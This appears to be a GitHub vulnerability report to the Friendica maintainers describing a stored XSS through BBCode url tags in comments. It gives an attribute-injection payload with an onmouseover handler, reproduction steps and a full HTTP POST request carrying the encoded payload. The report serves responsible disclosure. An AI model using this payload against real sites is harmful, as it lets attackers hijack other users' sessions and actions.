You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I found a vulnerability issue while testing Friendica locally. The vulnerability allows to inject a payload in a comment using BBCode tags causing a stored XSS affecting all the users that can read the comment.
Vulnerability Description
The vulnerability allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.
Steps to reproduce
Login to the application.
Create a new post.
Add a comment to the post with the following content: [url=http://www.example.com" onmouseover="alert('XSS')]text[/url]
Hover the mouse on the comment.
Observe the payload being triggered.
Proof of Concept
The request:
POST /item HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 160
Origin: http://localhost
Connection: close
Referer: http://localhost/profile/snajafov
Cookie: flash=no; _ga=GA1.1.912797092.1706817399; _ga_98KMNYED26=GS1.1.1706821804.4.0.1706821804.0.0.0; PHPSESSID=798fd11033df12e4df9d01086fbf993e
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
profile_uid=2&parent=52&jsreload=&post_id_random=330671535643&body=%5Burl%3Dhttp%3A%2F%2Fwww.example.com%22+onmouseover%3D%22alert('Comment')%5Dtext%5B%2Furl%5D
A similar issue with possible injection using BBCode tags was solved back in the days. Currently the payload present in that issue is not executed, however it seems like it's still possible to cause an injection using a different approach as described here.
I also opened a similar issue about XSS vulnerability in post content.
This is Friendica, version 2023.12 that is running at the web location http://localhost. The database version is 1542/1542, the post update version is 1507/1507.
Apache version: Apache/2.4.56 PHP version: PHP/8.1.27 DB version: 11.2.2-MariaDB
The text was updated successfully, but these errors were encountered:
Hello Friendica Team!
Issue detail
I found a vulnerability issue while testing Friendica locally. The vulnerability allows to inject a payload in a comment using BBCode tags causing a stored XSS affecting all the users that can read the comment.
Vulnerability Description
The vulnerability allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.
Steps to reproduce
[url=http://www.example.com" onmouseover="alert('XSS')]text[/url]
Proof of Concept
The request:
The response
Payload triggered
More details
A similar issue with possible injection using BBCode tags was solved back in the days. Currently the payload present in that issue is not executed, however it seems like it's still possible to cause an injection using a different approach as described here.
I also opened a similar issue about XSS vulnerability in post content.
References
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CAPEC-592: Stored XSS
Stored XSS
Cross Site Scripting Prevention Cheat Sheet
Platform Info
This is Friendica, version 2023.12 that is running at the web location http://localhost. The database version is 1542/1542, the post update version is 1507/1507.
Apache version: Apache/2.4.56
PHP version: PHP/8.1.27
DB version: 11.2.2-MariaDB
The text was updated successfully, but these errors were encountered: